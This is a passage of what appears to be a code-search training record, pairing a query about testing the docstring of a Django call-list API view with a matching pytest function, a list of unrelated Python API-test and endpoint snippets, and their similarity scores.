change_publicurl:\n ret[\"changes\"][\"publicurl\"] = publicurl\n\n if change_adminurl:\n ret[\"changes\"][\"adminurl\"] = adminurl\n\n if change_internalurl:\n ret[\"changes\"][\"internalurl\"] = internalurl\n\n if ret[\"comment\"]: # changed\n __salt__[\"keystone.endpoint_delete\"](\n name, region, profile=profile, interface=interface, **connection_args\n )\n _create_endpoint()\n ret[\"comment\"] += 'Endpoint for service \"{}\" has been updated'.format(name)\n\n else:\n # Add new endpoint\n if __opts__.get(\"test\"):\n ret[\"result\"] = None\n ret[\"changes\"][\"Endpoint\"] = \"Will be created\"\n ret[\"comment\"] = 'Endpoint for service \"{}\" will be added'.format(name)\n return ret\n _create_endpoint()\n ret[\"comment\"] = 'Endpoint for service \"{}\" has been added'.format(name)\n\n if ret[\"comment\"] == \"\": # => no changes\n ret[\"comment\"] = 'Endpoint for service \"{}\" already exists'.format(name)\n return ret", "def test_endpoint_status(self) -> None:\n status = self.client.endpoint_status\n self.assertIsInstance(status, dict)", "def test_list_authz_missing_dn_or_op(self):\n self.app.get(\"/config/authorize?operation=config\", status=200)\n self.app.get(\"/config/authorize?dn=/DN=a.test.user\", status=200)", "def test_get_non_existent_campaigns_returns_empty_list(self):\n response = self.client.get(self.endpoint_url)\n response_body = response.get_json()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response_body, {\"campaigns\": []})", "def response_contains_array_named(context, array_name):\n assert context.response\n response = context.response.json()\n assert array_name in response\n assert isinstance(response[array_name], list)", "def test_get_contact_lists(self):\n url, parsed = self.prepare_urls('v1:contact_list-list', subdomain=self.company.subdomain)\n \n response = self.client.get(url, HTTP_HOST=parsed.netloc)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n self.authenticate_user()\n response = self.client.get(url, HTTP_HOST=parsed.netloc)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n content = json.loads(response.content)\n self.assertEqual(len(content), self.contact_lists_count)", "def is_subcall(self):\n return False", "def is_caller_for_call_campaign(call_profile):\n caller_campaigns = find_campaigns_as_caller(call_profile)\n is_caller = len(caller_campaigns) > 0\n return is_caller", "def test_aws_service_api_interfaces_get(self):\n pass", "def _namespace_requested(self, namespace):\r\n if namespace is None:\r\n return False\r\n namespace_tuple = self._tuplefy_namespace(namespace)\r\n if namespace_tuple[0] in IGNORE_DBS:\r\n return False\r\n elif namespace_tuple[1] in IGNORE_COLLECTIONS:\r\n return False\r\n else:\r\n return self._tuple_requested(namespace_tuple)", "def test_missing_endpoint(self, req):\n req.side_effect = ks_exc.EndpointNotFound()\n self.client._get_resource_provider(self.context, \"fake\")\n\n # reset the call count to demonstrate that future calls still\n # work\n req.reset_mock()\n self.client._get_resource_provider(self.context, \"fake\")\n self.assertTrue(req.called)", "def check_ngin_access(subdata):\r\n r = verifyPort(999)\r\n print (r.status_code)\r\n if r.status_code == 204:\r\n return True\r\n else:\r\n return False\r\n \"\"\"\r\n if (subdata[0][0]):\r\n return True \r\n else:\r\n return False\r\n \"\"\"", "def _get_endpoint_list(name, filter_by, limit, offset, quiet, all_items):\n\n get_endpoint_list(name, filter_by, limit, offset, quiet, all_items)", "def test_grpc_app(self):\n self.assertTrue(isinstance(grpc_settings.grpc_apps, list))", "def _running_locally(coreapi_url, jobs_api_url):\n return not (coreapi_url and jobs_api_url)", "def test_urls(self):\n self.base_check_request(\"get\", \"/\")\n self.base_check_request(\"get\", \"apartments/\")\n self.base_check_request(\"get\", \"complexes/\")\n self.base_check_request(\"get\", \"locations/\")\n self.base_check_request(\"get\", \"companies/\")\n self.base_check_request(\"get\", \"companies-types/\")\n\n self.base_check_request(\"get\", \"count/apartments/\")\n self.base_check_request(\"get\", \"count/complexes/\")\n\n self.base_check_request(\"get\", \"search-forms/apartments/\")\n self.base_check_request(\"get\", \"search-forms/complexes/\")\n self.base_check_request(\"get\", \"search-forms/main/\")\n\n self.base_check_request(\"get\", \"autocomplete/companies/\")\n self.base_check_request(\"get\", \"autocomplete/complexes/\")\n self.base_check_request(\"get\", \"autocomplete/locations/\")\n\n self.base_check_request(\"get\", \"apartments_for_maps/?count=1&fields=lat,lon\")\n # self.base_check_request(\"get\", \"reserve/\")\n # self.base_check_request(\"get\", \"complain/\")\n # self.base_check_request(\"post\", \"apartment-complain/\")\n # self.base_check_request(\"post\", \"order-apartment/\")", "def test_basic_api_inline_openapi(self):\n self.create_and_verify_stack(\"single/basic_api_inline_openapi\")\n\n first_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(first_dep_ids), 1)\n\n body = self.get_template_resource_property(\"MyApi\", \"DefinitionBody\")\n body[\"basePath\"] = \"/newDemo\"\n self.set_template_resource_property(\"MyApi\", \"DefinitionBody\", body)\n self.update_stack()\n\n second_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(second_dep_ids), 1)\n\n self.assertEqual(len(set(first_dep_ids).intersection(second_dep_ids)), 0)", "def test_empty_list(self):\n response = self.client.get(self.api_link)\n self.assertEqual(response.status_code, 200)\n\n response_json = response.json()\n self.assertEqual(response_json['count'], 0)", "def test_class_has_url_for(self):\n self.assertNotEqual(NamedDocument.url_for_endpoints, ScopedNamedDocument.url_for_endpoints)", "def test_list(self):\n url = '/api/users/'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n r = response.json()\n self.assertTrue(isinstance(r['objects'], list))\n # Response should not contain inactive, contractors or shared accounts.\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.del_user.email)\n self.assertNotContains(response, self.contract_user.email)\n self.assertNotContains(response, self.shared.email)\n # Test the compact response.\n url = '/api/users/?compact=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n # Test the minimal response.\n url = '/api/users/?minimal=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)", "def api_base_checks(request, requester, services, cnxn,\n auth_client_ids, auth_emails):\n valid_user = False\n auth_err = ''\n client_id = None\n\n try:\n client_id = oauth.get_client_id(framework_constants.OAUTH_SCOPE)\n logging.info('Oauth client ID %s', client_id)\n except oauth.Error as ex:\n auth_err = 'oauth.Error: %s' % ex\n\n if not requester:\n try:\n requester = oauth.get_current_user(framework_constants.OAUTH_SCOPE)\n logging.info('Oauth requester %s', requester.email())\n except oauth.Error as ex:\n logging.info('Got oauth error: %r', ex)\n auth_err = 'oauth.Error: %s' % ex\n\n if client_id and requester:\n if client_id in auth_client_ids:\n # A whitelisted client app can make requests for any user or anon.\n logging.info('Client ID %r is whitelisted', client_id)\n valid_user = True\n elif requester.email() in auth_emails:\n # A whitelisted user account can make requests via any client app.\n logging.info('Client email %r is whitelisted', requester.email())\n valid_user = True\n else:\n auth_err = ('Neither client ID %r nor email %r is whitelisted' %\n (client_id, requester.email()))\n\n if not valid_user:\n raise endpoints.UnauthorizedException('Auth error: %s' % auth_err)\n else:\n logging.info('API request from user %s:%s', client_id, requester.email())\n\n project_name = None\n if hasattr(request, 'projectId'):\n project_name = request.projectId\n issue_local_id = None\n if hasattr(request, 'issueId'):\n issue_local_id = request.issueId\n # This could raise exceptions.NoSuchUserException\n requester_id = services.user.LookupUserID(cnxn, requester.email())\n auth = authdata.AuthData.FromUserID(cnxn, requester_id, services)\n if permissions.IsBanned(auth.user_pb, auth.user_view):\n raise permissions.BannedUserException(\n 'The user %s has been banned from using Monorail' %\n requester.email())\n if project_name:\n project = services.project.GetProjectByName(\n cnxn, project_name)\n if not project:\n raise exceptions.NoSuchProjectException(\n 'Project %s does not exist' % project_name)\n if project.state != project_pb2.ProjectState.LIVE:\n raise permissions.PermissionException(\n 'API may not access project %s because it is not live'\n % project_name)\n if not permissions.UserCanViewProject(\n auth.user_pb, auth.effective_ids, project):\n raise permissions.PermissionException(\n 'The user %s has no permission for project %s' %\n (requester.email(), project_name))\n if issue_local_id:\n # This may raise a NoSuchIssueException.\n issue = services.issue.GetIssueByLocalID(\n cnxn, project.project_id, issue_local_id)\n perms = permissions.GetPermissions(\n auth.user_pb, auth.effective_ids, project)\n config = services.config.GetProjectConfig(cnxn, project.project_id)\n granted_perms = tracker_bizobj.GetGrantedPerms(\n issue, auth.effective_ids, config)\n if not permissions.CanViewIssue(\n auth.effective_ids, perms, project, issue,\n granted_perms=granted_perms):\n raise permissions.PermissionException(\n 'User is not allowed to view this issue %s:%d' %\n (project_name, issue_local_id))\n\n return client_id, requester.email()", "def test_basic_api_inline_swagger(self):\n self.create_and_verify_stack(\"single/basic_api_inline_swagger\")\n\n first_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(first_dep_ids), 1)\n\n body = self.get_template_resource_property(\"MyApi\", \"DefinitionBody\")\n body[\"basePath\"] = \"/newDemo\"\n self.set_template_resource_property(\"MyApi\", \"DefinitionBody\", body)\n self.update_stack()\n\n second_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(second_dep_ids), 1)\n\n self.assertEqual(len(set(first_dep_ids).intersection(second_dep_ids)), 0)", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def ping_missing_api(request):\r\n return _api_response(request, {\r\n 'success': False,\r\n 'message': 'The API url should be /api/v1'\r\n })", "def test_api(test_name, endpoint, method, body, expected_response, expected_status_code, validation, params):\n response = None\n with allure.step(' '.join(['getting API response on endpoint:', str(endpoint)])):\n response = APIRequestor().request(method=method, url_path=endpoint, body=body, params=params)\n with allure.step(' '.join(['Asserting API status code expected:', str(expected_status_code), ', with response:', str(response.status_code)])):\n Compare.equal.__call__(a=expected_status_code, b=response.status_code, free_text=f\"Status code is not as expected: {response.status_code} instead of expected: {expected_status_code}\")\n with allure.step('starting API validation'):\n validation = 'equal' if not validation else validation\n with allure.step(' '.join(['Validation with method:', str(validation)])):\n Compare.__dict__[validation](a=str(response), b=str(expected_response),\n free_text=f\"Failed to compare, Response is not as expected: {response} instead of {expected_response}\")" ]
[ "0.62145686", "0.6031098", "0.597374", "0.59650505", "0.5733628", "0.55599207", "0.54912245", "0.54800916", "0.54037213", "0.5337027", "0.531804", "0.523795", "0.5225318", "0.5171135", "0.516988", "0.51654184", "0.5162458", "0.51472855", "0.51333857", "0.5127361", "0.5116722", "0.51103735", "0.5095321", "0.5081825", "0.5074543", "0.5068515", "0.5068172", "0.50617015", "0.5056106", "0.5055193", "0.5043452", "0.50354517", "0.5034325", "0.5024378", "0.50203836", "0.5014894", "0.49833632", "0.49799943", "0.49722326", "0.4961915", "0.49484244", "0.4936004", "0.4929235", "0.49259934", "0.4922954", "0.48972976", "0.48947394", "0.48833722", "0.48804182", "0.48709354", "0.48618183", "0.48608372", "0.48607847", "0.4857872", "0.48257625", "0.4821477", "0.48192298", "0.48083752", "0.48080382", "0.48008144", "0.479831", "0.47922242", "0.47866535", "0.47850537", "0.4779812", "0.47778076", "0.477043", "0.47680977", "0.475497", "0.47336307", "0.47305372", "0.47282237", "0.4727771", "0.47226912", "0.47188845", "0.47170278", "0.47043926", "0.4703479", "0.46961832", "0.46916613", "0.4689373", "0.46891242", "0.46886733", "0.4685948", "0.4683022", "0.467961", "0.46795642", "0.46763006", "0.46759635", "0.46759343", "0.46739724", "0.4663874", "0.4657999", "0.46579626", "0.4657374", "0.4650167", "0.46498704", "0.46493903", "0.46474797", "0.46438694" ]
0.77283394
0
Test for documentation on Call API Endpoint view
def test_documentation_for_call_view(): url = reverse_lazy('calls:call-list') view = resolve(url).func assert view.__doc__
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_view_detail_as_method(self):\n url = reverse(\n \"django-admindocs-views-detail\",\n args=[\"django.contrib.admin.sites.AdminSite.index\"],\n )\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)", "def test_view():\n\treturn \"this is a response\"", "def test_view_browsable_api(client):\n # Arbitrary endpoint. Important thing is we access an endpoint of\n # the browsable API and force an HTML response so that template\n # rendering is used.\n client.get(\"/accounts/users/\", HTTP_ACCEPT=\"text/html\")", "def testApi(self):", "def test_get_view_html(self):\n response = self.setup_get_html_test('/api/view/1')\n self.assertEqual(response.status_code, 200)", "def test_call(self):\r\n self.assertEqual(self.cs_overview(), {})\r\n self.assertEqual(self.cs_overview(10), {})", "def test_GET_call_api_and_return_200Ok(client):\n\n url = '/api/v1/calls/'\n\n response = client.get(url)\n\n assert response.status_code == status.HTTP_200_OK", "def test_get_response(self):\n c = Client()\n response = c.get(reverse('index_view'))\n self.assertEqual(response.status_code, 200)", "def test_get_api_resources(self):\n pass", "def test_callable_urlconf(self):\n\n def urlpatterns():\n return (\n path(\"admin/doc/\", include(\"django.contrib.admindocs.urls\")),\n path(\"admin/\", admin.site.urls),\n )\n\n with self.settings(ROOT_URLCONF=SimpleLazyObject(urlpatterns)):\n response = self.client.get(reverse(\"django-admindocs-views-index\"))\n self.assertEqual(response.status_code, 200)", "def test_view_url_exists_api_alerts(self):\n response = self.client.get('/api/alerts/')\n self.assertEqual(response.status_code, 200)", "def test_view(self):\n self.assertEqual(status.HTTP_200_OK, self.response.status_code)", "def test_TodoList_views_get(self):\n # testing the urls\n client = Client()\n response = client.get(reverse('TodoList'))\n self.assertEqual(response.status_code,200)\n #self.assertTemplateUsed(response,'webapp/todolistmodel.html')", "def test_view_index_with_method(self):\n response = self.client.get(reverse(\"django-admindocs-views-index\"))\n self.assertContains(\n response,\n \"<h3>\"\n '<a href=\"/admindocs/views/django.contrib.admin.sites.AdminSite.index/\">'\n \"/admin/</a></h3>\",\n html=True,\n )", "def api():\n\treturn \"The API call\"", "def test_simple_request(self):\n urls = [\"https://api.omniture.com/admin/1.4/rest/\",\n \"https://api2.omniture.com/admin/1.4/rest/\",\n \"https://api3.omniture.com/admin/1.4/rest/\",\n \"https://api4.omniture.com/admin/1.4/rest/\",\n \"https://api5.omniture.com/admin/1.4/rest/\"]\n self.assertIn(self.analytics.request('Company', 'GetEndpoint'),urls, \"Company.GetEndpoint failed\" )", "def _access_endpoint(self, endpoint, args, status_code, msg):\r\n url = reverse(endpoint, kwargs={'course_id': self.course.id.to_deprecated_string()})\r\n if endpoint in ['send_email']:\r\n response = self.client.post(url, args)\r\n else:\r\n response = self.client.get(url, args)\r\n self.assertEqual(\r\n response.status_code,\r\n status_code,\r\n msg=msg\r\n )", "def test_get_allowed_methods(self):\n from django.contrib.auth.models import User\n\n class MyViewSet(ModelViewSet):\n serializer_class = CommentSerializer\n model = User\n\n docgen = DocumentationGenerator()\n\n # Test a list endpoint\n allowed_methods = docgen.__get_allowed_methods__(MyViewSet, '/api/endpoint')\n self.assertEqual(2, len(allowed_methods))\n self.assertIn('POST', allowed_methods)\n self.assertIn('GET', allowed_methods)\n\n # Test an object endpoint\n allowed_methods = docgen.__get_allowed_methods__(MyViewSet, '/api/endpoint/{pk}')\n self.assertEqual(4, len(allowed_methods))\n self.assertIn('POST', allowed_methods)\n self.assertIn('PATCH', allowed_methods)\n self.assertIn('DELETE', allowed_methods)\n self.assertIn('GET', allowed_methods)", "def test_1():\n\tassert api_call().status_code == 200", "def test_mocked_get_list_template(self):\n c = Client()\n response = c.get(reverse('mocked'))\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Here is the list of all possible apis:\",\n response.content)\n self.assertIn(\"^mocked_post$\", response.content)", "def test_mocked_get_list_template(self):\n c = Client()\n response = c.get(reverse('mocked'))\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Here is the list of all possible apis:\",\n response.content)\n self.assertIn(\"^mocked_get$\", response.content)", "def test_api_response_data(self):", "def test_get(self):\n request_factory = RequestFactory()\n request = request_factory.get(reverse('popular_devices'))\n response = PopularDevicesView.as_view()(request)\n\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n request_factory = RequestFactory()\n request = request_factory.get(reverse('filter_devices'))\n response = FilterDevicesView.as_view()(request)\n\n self.assertEqual(response.status_code, 200)", "def test_get_one(self):\n response = self.client.get('/api/v1/parcels/100')\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n pass", "def test_index(self):\n resp = self.app.get('/')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n self.assertIn('Inventory Demo REST API Service', resp.data)\n # resp = self.app.get('/')\n # self.assertEqual(resp.status_code, status.HTTP_200_OK)\n # data = json.loads(resp.data)\n # self.assertEqual(data['name'], 'Inventory Demo REST API Service')", "def api(self) -> str:", "def test_doc():\n pass", "def test_index(self):\n resp = self.app.get(\"/\")\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n self.assertIn(b\"Product Demo REST API Service\", resp.data)", "def test_index_view(self):\n response = self.client.get(reverse('index'))\n self.assertEquals(response.status_code, 200)", "def get(self, request, format=None):\n an_apiview = [\n \"User HTTp methods get, put, post, delete method\",\n \"very similar to previous Django view\",\n \"gives you more control on api logic\",\n 'Is mapped to manually to urls'\n ]\n\n return Response({'message':\"hello\", \"an_apiview\": an_apiview} )", "def test_59_help_api(self):\r\n Fixtures.create()\r\n url = \"/help/api\"\r\n res = self.app.get(url, follow_redirects=True)\r\n err_msg = \"There should be a help api page\"\r\n assert \"API Help\" in res.data, err_msg", "def test_namespace_of_call_api_endpoint():\n\n url = '/api/v1/calls/'\n resolved = resolve(url)\n\n assert resolved.namespace == 'calls'\\\n and resolved.url_name == 'call-list'", "def test_office_list(self):\n url = '/api/v1/consultorios/'\n request = self.client.get(url)\n self.assertEqual(request.status_code, status.HTTP_200_OK)", "def get(self,request,format = None):\n an_apiview = [\n 'Uses HTTP methods as function (get,post,patch,put,delete)',\n 'Is similar to a traditional Django View',\n 'Gives you the most control over your appliction logic',\n 'Is mapped manually to URLs'\n ]\n return Response({'message':'Hello!','an_apiview': an_apiview})", "def test_api_list_view(dummy_request, add_models):\n from learning_journal.views.default import api_list_view\n assert len(api_list_view(dummy_request)) == len(ENTRIES)", "def test_index_view(self):\n response = self.client.get('/')\n eq_(response.status_code, 200)", "def test_api_response(self):\n # url = 'http://127.0.0.1:8000/api/aircraft/'\n url = reverse('airlines:aircraft-list')\n response = self.client.get(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def get(self, request, format=None):\n an_apiview = [\n 'Uses HTTP methods as functions(get, post, patch, put, delete)',\n 'Is similar to traditional Django view',\n 'Give you the most control over your app logic',\n 'Is mapped manually to URLs'\n ]\n return Response({'message':'Hello!', 'an_apiview':an_apiview})", "def test_get(self):\n self.assertEqual(200, self.response.status_code)", "def test_get(self):\n self.assertEqual(200, self.response.status_code)", "def test_about_view(self):\n print 'Running %s ...' % getName()\n# test that URL resolves to correct views function \n found = resolve('/sequencelistings/about/')\n self.assertEqual(found.func, views.about)\n \n self.sequenceListingFixture.create_sequence_instance(self.sequenceListing)\n \n response = self.client.get(reverse('sequencelistings:about'))\n self.assertEqual(response.status_code, 200)\n \n# test that the page returns expected html contents\n self.assertContains(response, 'About')\n self.assertContains(response, 'only for information purposes')", "def test_00_api_get(self):\r\n # GET as Anonymous\r\n url = '/api/'\r\n action = 'get'\r\n self.check_limit(url, action, 'app')", "def test_help_route():\n response = client.get(\"/\")\n assert response.status_code == 200\n assert response.json() == {\n \"repositories\": f\"{DOMAIN_NAME}/repositories\",\n \"developers\": f\"{DOMAIN_NAME}/developers\",\n \"docs\": f\"{DOMAIN_NAME}/docs\",\n \"redoc\": f\"{DOMAIN_NAME}/redoc\",\n }", "def test_faq_view(self):\n response = self.client.get(url_for('main.faq'))\n self.assertEqual(response.status_code, 200)", "def web_service_response_example(self, action, controller):", "def test_the_info_view(self):\n\n info_url = resolve('/')\n self.assertEqual(info_url.func.__name__, 'Info_view')\n self.assertEqual(self.response.status_code, 200)", "def test_view(self):\n # regular call\n resp = self.is_callable()\n self.assertEqual(\n resp.template_name[0], 'calendarium/calendar_month.html', msg=(\n 'Returned the wrong template.'))\n self.is_postable(data={'next': True}, to_url_name='calendar_month')\n self.is_postable(data={'previous': True}, to_url_name='calendar_month')\n self.is_postable(data={'today': True}, to_url_name='calendar_month')\n\n # called with a invalid category pk\n self.is_callable(data={'category': 'abc'})\n\n # called with a non-existant category pk\n self.is_callable(data={'category': '999'})\n\n # called with a category pk\n category = mixer.blend('calendarium.EventCategory')\n self.is_callable(data={'category': category.pk})\n\n # called with wrong values\n self.is_not_callable(kwargs={'year': 2000, 'month': 15})", "def test_detail_views(self):\n obj = self.create_post(title='Some new title for new test')\n response = self.client.get(obj.get_absolute_url())\n # TODO You need to check that the description and title are present in the html returned from the server Dilshad\n self.assertEqual(response.status_code, 200)", "def test_get_offers(self):\n pass", "def test_response(self):\n\n request = self.factory.get(self.url)\n\n response = ProviderInfoView.as_view()(request)\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response['Content-Type'] == 'application/json', True)\n self.assertEqual(bool(response.content), True)", "def get(self, request, format=None):\n an_apiview = [\n 'Uses HTTP methods as function (get, post, put, delete)',\n 'Is similar to a traditional Django view',\n 'Gives you the most control over you application logic',\n 'Is mapped manually to URLs',\n ]\n\n return Response({'message':'Hello', 'an_view':an_apiview})", "def test_view(self):\n resp = self.is_callable()\n self.assertEqual(\n resp.template_name[0], 'calendarium/calendar_week.html', msg=(\n 'Returned the wrong template.'))\n self.is_postable(data={'next': True}, to_url_name='calendar_week')\n self.is_postable(data={'previous': True}, to_url_name='calendar_week')\n self.is_postable(data={'today': True}, to_url_name='calendar_week')\n\n resp = self.is_callable(ajax=True)\n self.assertEqual(\n resp.template_name[0], 'calendarium/partials/calendar_week.html',\n msg=('Returned the wrong template for AJAX request.'))\n self.is_not_callable(kwargs={'year': self.year, 'week': '60'})", "def test_swagger(self):\n response = self.client.get(\"/api/v1/swagger\", query_string=dict(validate_schema=True))\n assert_that(response.status_code, is_(equal_to(200)))\n swagger = loads(response.get_data().decode(\"utf-8\"))\n # we have the swagger docs endpoint too, which is implemented as a query.\n # ignore it here for now.\n del swagger[\"paths\"][\"/swagger/docs\"]\n assert_that(swagger[\"paths\"], is_(equal_to({\n \"/foo/get\": {\n \"get\": {\n \"description\": \"My doc string\",\n \"tags\": [\"foo\"],\n \"responses\": {\n \"default\": {\n \"description\": \"An error occurred\", \"schema\": {\n \"$ref\": \"#/definitions/Error\",\n }\n },\n \"200\": {\n \"description\": \"My doc string\",\n \"schema\": {\n \"$ref\": \"#/definitions/QueryResult\",\n }\n }\n },\n \"parameters\": [\n {\n \"in\": \"header\",\n \"name\": \"X-Response-Skip-Null\",\n \"required\": False,\n \"type\": \"string\",\n \"description\": \"Remove fields with null values from the response.\"\n },\n {\n \"required\": False,\n \"type\": \"string\",\n \"name\": \"optional_value\",\n \"in\": \"query\",\n },\n {\n \"required\": True,\n \"type\": \"string\",\n \"name\": \"required_value\",\n \"in\": \"query\",\n },\n ],\n \"operationId\": \"query\",\n }\n }\n })))", "def test_api(test_name, endpoint, method, body, expected_response, expected_status_code, validation, params):\n response = None\n with allure.step(' '.join(['getting API response on endpoint:', str(endpoint)])):\n response = APIRequestor().request(method=method, url_path=endpoint, body=body, params=params)\n with allure.step(' '.join(['Asserting API status code expected:', str(expected_status_code), ', with response:', str(response.status_code)])):\n Compare.equal.__call__(a=expected_status_code, b=response.status_code, free_text=f\"Status code is not as expected: {response.status_code} instead of expected: {expected_status_code}\")\n with allure.step('starting API validation'):\n validation = 'equal' if not validation else validation\n with allure.step(' '.join(['Validation with method:', str(validation)])):\n Compare.__dict__[validation](a=str(response), b=str(expected_response),\n free_text=f\"Failed to compare, Response is not as expected: {response} instead of {expected_response}\")", "def test_all_endpoint_status():\n r = client.get('/openapi.json')\n assert r.status_code == 200\n for e in r.json()['paths'].keys():\n r = client.get(e)\n assert r.status_code == 200\n\n for e in ['plot']:\n r = client.get(e)\n assert r.status_code == 200", "def view_function(*args, **kwargs):\n\n res = {}\n status = 200\n\n try:\n from apis import apis\n url_rule = request.url_rule.rule\n apis_keys = [a[1:] for a in apis.keys()]\n url_rule_splitted = [a for a in url_rule.split(\"/\") if a in apis_keys]\n blueprint = url_rule_splitted[-1]\n blueprint = \"/\" + blueprint\n\n controller_function = apis[blueprint].functions[url_rule]\n res, status = controller_function(args, kwargs, request=request)\n\n except Exception as exc:\n # TODO: log error\n print(exc)\n\n res['error'] = True\n status = 400\n\n return res, status", "def test_view_response_via_url(self):\n request = self.factory.get(reverse('homepage'))\n\n response = HomePageView.as_view()(request)\n\n # Check that 200 is returned as status code\n self.assertEquals(response.status_code, 200)", "def overview():\n return render_template('api/api.html', title='API Overview')", "def test_open_api(self):\n response = self.client.get(self.initiatives_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def test_index_view(self):\n response = self.client.get(url_for('main.index'))\n self.assertEqual(response.status_code, 200)", "def testEndpoint(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # With no UID given\n status, _ = self._http_get(\"/endpoint\")\n\n # Check result\n self.assertEqual(status, 404)\n\n # Register a service\n svc_reg = context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Request the details of the endpoint\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 200)\n\n # Check the content\n data = json.loads(response)\n for key, attr in (('uid', 'uid'), ('sender', 'framework'),\n ('name', 'name')):\n self.assertEqual(data[key], getattr(endpoint, attr))\n\n # Unregister it\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, _ = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 404)", "def apiDocs():\n\treturn render_template('apiDocs.html')", "def test_api(self):\n new_route = self.route.api(\"new\")\n assert new_route != self.route\n assert new_route.route[\"api\"] == \"new\"", "def call(self) -> global___Snippet.ClientCall:", "def call(self) -> global___Snippet.ClientCall:", "def test_dashboards_v2_request_access(self):\n pass", "def get(self, request, format=None):\n an_apiview = [\n 'Uses HTTP methods as functions (get,post,patch,put,delete)',\n 'Is similar to a traditional django view',\n 'Gives you the most control over the applicaton logic',\n 'Is mapped manually to the URLs',\n ]\n return Response({'message': 'get method', 'an_apiview': an_apiview})", "def test_view(self):\n resp = self.is_callable()\n self.assertEqual(\n resp.template_name[0], 'calendarium/calendar_day.html', msg=(\n 'Returned the wrong template.'))\n self.is_postable(data={'next': True}, to_url_name='calendar_day')\n self.is_postable(data={'previous': True}, to_url_name='calendar_day')\n self.is_postable(data={'today': True}, to_url_name='calendar_day')\n self.is_not_callable(kwargs={'year': self.year, 'month': '14',\n 'day': self.day})", "def test_get_model_list():\n with app.test_client() as c:\n response = c.get('/REST/api/v1.0/model_list') \n assert response.status_code == 201", "def test_assemble_endpoint_data(self):\n urlparser = UrlParser()\n pattern = self.url_patterns[0]\n\n data = urlparser.__assemble_endpoint_data__(pattern)\n\n self.assertEqual(data['path'], '/a-view/')\n self.assertEqual(data['callback'], MockApiView)\n self.assertEqual(data['pattern'], pattern)", "def test_main(self):\n path = reverse(\"main\")\n request = RequestFactory().get(path)\n response = index(request)\n assert response.status_code == 200", "def get(self, request, format=None):\n\n an_apiview= [\n 'Uses HTTP methods as functions (get, post, patch, put, delete)',\n 'Is similar to a traditional Django View',\n 'Gives you the most control over your logic',\n 'Is mapped manually to URLs',\n 'Douki mohamed',\n ]\n\n return Response({'message': 'Hello Douki!', 'an_apiview': an_apiview})", "def test_gourde_views(self):\n rv = self.app.get(\"/-/\")\n self.assertEqual(rv.status_code, 200)\n\n rv = self.app.get(\"/-/threads\")\n self.assertEqual(rv.status_code, 200)\n\n rv = self.app.get(\"/-/ready\")\n self.assertEqual(rv.status_code, 200)", "def test_api_use_method_post(self):\n body = Body()\n response = self.client.open(\n '/api/use/{method}/'.format(method='method_example'),\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def View(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def test_api_redirects_to_docs(self):\n\n\t\twith self.client:\n\t\t\tget_doc = self.client.get('/')\n\t\t\tself.assertTrue(get_doc.status_code == 302)", "def test_detail(self):\n response = self.client.get('/routines/{}/'.format(self.rout1.id))\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['id'], self.rout1.id)", "def test_metadata(self):\n class ExampleView(views.APIView):\n \"\"\"Example view.\"\"\"\n pass\n\n view = ExampleView.as_view()\n response = view(request=request)\n expected = {\n 'name': 'Example',\n 'description': 'Example view.',\n 'renders': [\n 'application/json',\n 'text/html'\n ],\n 'parses': [\n 'application/json',\n 'application/x-www-form-urlencoded',\n 'multipart/form-data'\n ]\n }\n assert response.status_code == status.HTTP_200_OK\n assert response.data == expected", "def view(self):", "def test_connexion_view(self):\n c = Client()\n response = c.get('/connexion/')\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n self.assertEqual(200, self.resp.status_code)", "def test_get(self):\n self.assertEqual(200, self.resp.status_code)", "def test_agency_endpoint(client, create_agency_data):\n\n resp = client.get(\"/api/v2/references/agency/1/\")\n assert resp.status_code == status.HTTP_200_OK\n\n assert resp.data[\"results\"][\"outlay_amount\"] == \"2.00\"\n assert resp.data[\"results\"][\"obligated_amount\"] == \"2.00\"\n assert resp.data[\"results\"][\"budget_authority_amount\"] == \"2.00\"\n assert resp.data[\"results\"][\"congressional_justification_url\"] == \"test.com/cj\"\n assert resp.data[\"results\"][\"current_total_budget_authority_amount\"] == 